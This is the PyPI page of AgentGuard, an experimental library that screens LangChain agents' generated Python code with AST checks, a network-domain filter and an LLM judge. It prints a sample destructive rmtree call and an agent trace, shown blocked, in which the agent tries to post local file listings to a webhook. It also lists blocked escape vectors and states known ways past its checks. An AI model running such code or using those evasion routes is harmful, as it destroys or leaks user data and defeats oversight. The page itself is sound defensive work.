Skip to main content

๐Ÿ›ก๏ธ AgentGuard

Experimental security guardrails for LangChain agent code execution.

[!WARNING] Alpha / Proof of Concept โ€” This project is an experimental research tool, not a production-grade security boundary. The current in-process execution model has known limitations. Use it as an additional layer of defense, not as your only one.

CI PyPI Python License: MIT Code style: ruff


๐Ÿค” The Problem

Modern LangChain agents can generate and execute Python code autonomously. A single malicious prompt or hallucination can lead an agent to generate destructive code:

# An agent asked to "clean up temp files" might generate:
import os
import shutil
shutil.rmtree("/var/data/users")  # ๐Ÿ’€ Oops.

There is no native guardrail in LangChain to prevent this. AgentGuard adds pre-execution filters to catch obvious dangerous patterns before they run.


โœ… What It Does

AgentGuard wraps your agent's code execution tool in a 3-layer validation pipeline. Before any LLM-generated code runs, it must pass through all three layers:

flowchart TD
    A["๐Ÿค– LLM Agent generates code"] --> B{"๐Ÿ” Layer 1: AST Validator"}
    B -->|"โœ… Pass"| C{"๐ŸŒ Layer 2: Network Filter"}
    B -->|"โŒ Blocked"| E["๐Ÿ›ก๏ธ SecurityBlockedError\nโ†’ Agent self-corrects"]
    C -->|"โœ… Pass"| D{"๐Ÿง  Layer 3: Semantic Judge"}
    C -->|"โŒ Blocked"| E
    D -->|"โœ… SAFE"| F["โšก Restricted exec()\nโ†’ Result back to Agent"]
    D -->|"โŒ UNSAFE"| E

    style A fill:#4a9eff,color:#fff
    style B fill:#ff9f43,color:#fff
    style C fill:#ff9f43,color:#fff
    style D fill:#ff9f43,color:#fff
    style E fill:#ee5a24,color:#fff
    style F fill:#2ed573,color:#fff

If any layer blocks the code, the agent receives a descriptive error message and can self-correct โ€” instead of crashing or failing silently.


๐Ÿ›ก๏ธ How It Works in Action

> Entering new AgentExecutor chain...

Thought: I need to read the local files and send them to a webhook.
Action: safe_python_repl
Action Input:
import os
import requests
files = os.listdir('.')
requests.post('https://webhook.site/test', json={"files": files})

Observation: [AgentGuard | AST Validator] ๐Ÿ”ด BLOCKED โ€” Forbidden import
detected: 'os'. Rewrite the code without the forbidden operation.

Thought: I am not allowed to use the 'os' module. I cannot fulfill this
request as it requires system access.
Final Answer: ๐Ÿ›‘ I am restricted from accessing the local file system or
sending data to external webhooks due to security policies.

๐Ÿš€ Quick Start

pip install securellm-agentguard
from agentguard import SafePythonREPLTool, SecurityPolicy

# Define your security rules
policy = SecurityPolicy(
    allowed_modules=["pandas", "json", "math"],
    allowed_domains=["api.github.com"],
    use_semantic_judge=False,  # Set True + pass judge_llm for Layer 3
)

safe_repl = SafePythonREPLTool(policy=policy)

# Use it in your LangChain agent instead of PythonREPLTool
# agent = create_react_agent(llm=your_llm, tools=[safe_repl])

With Layer 3 (optional โ€” any LangChain-compatible LLM):

from langchain_google_genai import ChatGoogleGenerativeAI  # or ChatOpenAI, ChatAnthropic, etc.

judge_llm = ChatGoogleGenerativeAI(model="gemini-2.0-flash")
safe_repl = SafePythonREPLTool(policy=policy, judge_llm=judge_llm)

Note: Layer 3 works with any BaseChatModel โ€” Gemini, GPT-4, Claude, Mistral, Ollama, etc.


โš™๏ธ SecurityPolicy Options

Parameter Type Default Description
allowed_modules list[str] ["math", "json", ...] Whitelisted Python modules
allowed_domains list[str] [] (block all) Whitelisted network domains
use_semantic_judge bool True Enable LLM semantic analysis
execution_timeout int 10 Max execution seconds

๐Ÿ”’ Security Layers in Detail

Layer 1 โ€” AST Static Validator

Uses Python's native ast module to parse the code without executing it.

Blocks:

  • Any import not explicitly whitelisted in allowed_modules
  • from X import Y style imports of non-whitelisted modules
  • Dangerous built-in calls: exec, eval, compile, open, __import__
  • Common escape vectors: getattr, setattr, delattr, globals, locals

Speed: ~0.1ms โ€” no I/O, no network, pure AST traversal.

Layer 2 โ€” Network Filter

Uses regex patterns to detect outbound network calls and validates target domains against the whitelist.

Detects:

  • requests.get/post/put/delete/patch/head
  • httpx and aiohttp calls
  • urllib.request.urlopen and urlretrieve
  • Raw socket.connect() calls
  • Bare URL literals (https://...)

Note: This is a heuristic regex-based filter, not an OS-level network control. Sophisticated obfuscation may evade it โ€” Layer 3 exists to catch what Layers 1 & 2 miss.

Layer 3 โ€” Semantic Judge (LLM)

For subtle attacks that evade static analysis (e.g. a loop that deletes files one-by-one), the code is sent to a fast LLM (e.g. gemini-2.0-flash) with a strict binary prompt.

Verdict: Only code classified as SAFE passes. Anything else (including ambiguous responses) is blocked โ€” fail-closed by design.

Note: The LLM judge is a probabilistic defense โ€” it can be wrong. It also sends code to a third-party API. Use it as an additional signal, not as a guarantee.

Restricted Execution

Code that passes all 3 layers runs in a restricted in-process environment:

  • Safe builtins only โ€” print, len, range, etc. (no exec, eval, open)
  • Controlled __import__ โ€” only policy-whitelisted modules can be imported
  • stdout capture โ€” print() output is returned to the agent
  • Timeout enforcement โ€” configurable via execution_timeout

โš ๏ธ Known Limitations

This is an alpha-stage research project. The following limitations are known:

Limitation Detail
In-process execution Code runs via exec() in a restricted builtins dict, not in a separate process or container. A determined attacker could escape via object introspection chains on authorized modules.
Thread-based timeout Python threads cannot be forcibly killed. After a timeout, the code may continue running in the background.
Regex-based network filter The network filter is heuristic. Obfuscated URLs or dynamically-constructed network calls will not be caught by Layer 2.
LLM judge is probabilistic The semantic judge can be wrong, manipulated, or bypassed. It also sends code to a third-party API.

Planned for v0.2: Subprocess/container-based isolation with OS-level controls, adversarial test suite, and killable execution.


๐Ÿ“ Project Structure

agentguard/
โ”œโ”€โ”€ agentguard/
โ”‚   โ”œโ”€โ”€ __init__.py              # Public API exports
โ”‚   โ”œโ”€โ”€ policy.py                # SecurityPolicy (Pydantic model)
โ”‚   โ”œโ”€โ”€ exceptions.py            # SecurityBlockedError
โ”‚   โ”œโ”€โ”€ validators/
โ”‚   โ”‚   โ”œโ”€โ”€ ast_validator.py     # Layer 1: Static AST analysis
โ”‚   โ”‚   โ””โ”€โ”€ network_filter.py    # Layer 2: Network domain filter
โ”‚   โ”œโ”€โ”€ judges/
โ”‚   โ”‚   โ””โ”€โ”€ gemini_judge.py      # Layer 3: LLM semantic judge
โ”‚   โ””โ”€โ”€ tools/
โ”‚       โ””โ”€โ”€ langchain_tool.py    # SafePythonREPLTool (LangChain BaseTool)
โ”œโ”€โ”€ tests/                       # Pytest suite (mocked LLM for Layer 3)
โ”œโ”€โ”€ examples/
โ”‚   โ”œโ”€โ”€ basic_agent.py           # Simple agent + AgentGuard demo
โ”‚   โ””โ”€โ”€ threat_intel_demo.py     # Threat analysis agent demo
โ”œโ”€โ”€ pyproject.toml               # Poetry config + metadata
โ”œโ”€โ”€ .github/workflows/ci.yml     # GitHub Actions CI
โ””โ”€โ”€ README.md

๐Ÿ—บ๏ธ Roadmap

  • 3-layer validation pipeline (AST + Network + Semantic Judge)
  • LangChain BaseTool integration
  • Restricted execution with safe builtins
  • Timeout enforcement
  • GitHub Actions CI
  • PyPI Publication โ€” pip install securellm-agentguard
  • Process/Container Isolation โ€” replace in-process exec with a killable subprocess or ephemeral container
  • Adversarial Test Suite โ€” sandbox escape tests, obfuscation tests, resource abuse tests
  • Logging & Audit Trail โ€” structured logs of every blocked/allowed execution
  • Plugin System โ€” custom validator layers via a simple interface
  • LangSmith Integration โ€” trace security events in LangSmith

๐Ÿค Contributing

Contributions are welcome! Please read CONTRIBUTING.md first.

๐Ÿ” Security

Found a vulnerability? Please read SECURITY.md for responsible disclosure instructions.

๐Ÿ“„ License

MIT โ€” see LICENSE.


Built by Thomas LEON ยท Emerging Technologies & Threat Intelligence

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

securellm_agentguard-0.1.1.tar.gz (16.1 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

securellm_agentguard-0.1.1-py3-none-any.whl (16.9 kB view details)

Uploaded Python 3

File details

Details for the file securellm_agentguard-0.1.1.tar.gz.

File metadata

  • Download URL: securellm_agentguard-0.1.1.tar.gz
  • Upload date:
  • Size: 16.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.14

File hashes

Hashes for securellm_agentguard-0.1.1.tar.gz
Algorithm Hash digest
SHA256 c8d17dcf22b350dd7347313d3e30d91c7df7c6038fe3a1de42f55b07aadabfeb
MD5 220a79aeb8cc267e7ad74e70e7fd81ba
BLAKE2b-256 e154b971da75c5a8e21e37642819de62a9c2255d320eeb6bf1fab1e941d528b2

See more details on using hashes here.

Provenance

The following attestation bundles were made for securellm_agentguard-0.1.1.tar.gz:

Publisher: publish.yml on Thomas-LEON/agentguard

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file securellm_agentguard-0.1.1-py3-none-any.whl.

File metadata

File hashes

Hashes for securellm_agentguard-0.1.1-py3-none-any.whl
Algorithm Hash digest
SHA256 193c0941314191677a5b3afcccb665b378249a5bf084b87f2844f07d9ca0c843
MD5 25edcd98e7b56a90fc91441f6a68d62f
BLAKE2b-256 f608b4d1e904aaa397b0e45141fe4e00be91aa11eed942b426a857066d70a489

See more details on using hashes here.

Provenance

The following attestation bundles were made for securellm_agentguard-0.1.1-py3-none-any.whl:

Publisher: publish.yml on Thomas-LEON/agentguard

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page